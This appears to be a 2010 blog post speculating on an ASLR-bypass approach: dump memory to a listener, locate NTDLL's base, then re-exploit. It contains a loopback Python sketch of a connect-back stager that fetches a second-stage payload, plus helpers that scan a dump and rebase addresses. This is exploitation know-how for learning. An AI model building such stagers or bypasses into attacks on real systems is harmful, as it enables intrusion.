Thursday, December 2, 2010

The not-so-typical multi-staged exploit

After doing a lot of research on exploit mitigation techniques (ASLR, DEP, stack cookies, etc.), understanding exploitation methodologies like return-to-libc, and watching Dino Dai Zovi's talk "Memory Corruption, Exploitation, and You," I thought about a different type of exploitation technique: a multi-staged exploit where the second stage isn't the machine taking in the code you want to execute, but where the second stage is the actual exploit.

Typical multi-stage exploitation is done in the following manner:

1. Application is exploited, and the stager code is run
2. The stager code connects back to a configured host and obtains the actual payload that the attacker wants to run (reverse shell, meterpreter, calc, whatever)
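The two steps above can be sketched on the wire. This Python stands in for what is normally a tiny blob of shellcode, purely to show the protocol; every name here (`handler`, `stager`, `PAYLOAD`) is illustrative, not from any real tool.

```python
import socket
import threading

# Step 2 of the classic flow: a tiny "stager" connects back to the
# attacker's handler and pulls down the real payload. In practice the
# stager is a few dozen bytes of shellcode; Python is a stand-in.

PAYLOAD = b"second-stage payload (reverse shell, meterpreter, ...)"

def handler(listener):
    """Attacker side: wait for the stager, ship the real payload."""
    conn, _ = listener.accept()
    conn.sendall(PAYLOAD)
    conn.close()

def stager(host, port):
    """Victim side: connect back and receive the second stage."""
    s = socket.create_connection((host, port))
    data = b""
    while True:
        chunk = s.recv(4096)
        if not chunk:
            break
        data += chunk
    s.close()
    return data  # a real stager would now jump into this buffer

# Loopback demo wiring: attacker handler in a thread, stager in the main thread.
listener = socket.socket()
listener.bind(("127.0.0.1", 0))  # ephemeral port for the demo
listener.listen(1)
t = threading.Thread(target=handler, args=(listener,))
t.start()
stage2 = stager("127.0.0.1", listener.getsockname()[1])
t.join()
listener.close()
```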


The case that I am thinking about is where ASLR is in place, and an attacker can't reliably point EIP at a piece of memory to take over execution.  Dino states in the presentation something to the extent of:

Exploits are going to move away from typical code execution and more towards memory dumps


The whole concept of ASLR is to randomize where libraries exist in memory, invalidating jumps to static addresses in those libraries as a way of taking control of execution flow.
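A toy simulation of that idea (assumed behavior, not a real loader; `FUNC_OFFSET` and `load_library` are invented for illustration): an address hard-coded from one run is stale on the next, while base-plus-fixed-offset stays valid once the base is known.

```python
import random

FUNC_OFFSET = 0x1A2B  # a function's fixed offset inside the library

def load_library():
    """Pretend loader: pick a fresh page-aligned base each run, as ASLR does."""
    return random.randrange(0x10000, 0x7FFF0000, 0x1000)

base_run1 = load_library()
hardcoded_target = base_run1 + FUNC_OFFSET  # what a static exploit bakes in

base_run2 = load_library()  # next run: new randomized base
real_target = base_run2 + FUNC_OFFSET
# hardcoded_target is almost certainly wrong now, but anyone who learns
# base_run2 can recompute real_target exactly.
```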

But what if you could dump memory to a listener from a known start location, look for a signature showing where something like NTDLL exists, compute the offset, and then re-exploit the application using the now-known address you originally wanted to jump to when ASLR was not in place?  The workflow would be something like this:

1. Have memory listener/processor running
2. Exploit application to dump memory to #1
3. #1 looks for the NTDLL start signature and computes the base offset (if you are dumping from address 0)
4. Re-exploit application with now known memory offset
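Steps 1 and 3 of the listener/processor can be sketched as follows, assuming the dump starts at a known address. `NTDLL_SIG`, `find_module_base`, and `rebase` are made-up names, and a real scan would validate the full PE header rather than four bytes.

```python
# Illustrative signature: the DOS "MZ" header bytes that open a PE image.
NTDLL_SIG = b"MZ\x90\x00"

def find_module_base(dump, dump_start, signature):
    """Step 3: return the absolute address of `signature` inside `dump`,
    given that the dump began at address `dump_start`."""
    idx = dump.find(signature)
    if idx < 0:
        raise ValueError("signature not found in dump")
    return dump_start + idx

def rebase(module_base, rva):
    """Once the randomized base is known, the function or gadget you
    originally wanted is just base + its fixed offset within the module."""
    return module_base + rva
```

With the recomputed address in hand, step 4 is just the original exploit with the new value swapped in for the pre-ASLR static address.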

There are a lot of unknowns on my part, simply because I am not an expert at exploitation, but the concept seems somewhat feasible.

Unknowns:
- If you can exploit something to dump memory, why can't you run arbitrary code?
- You must have some way of getting a known offset to calculate the library offset
- The application must not crash, or must restart after the initial exploitation
- The memory dump is something that can be used in the above case
- Does ASLR stop return-to-libc? Or is libc loaded at a static address every time?
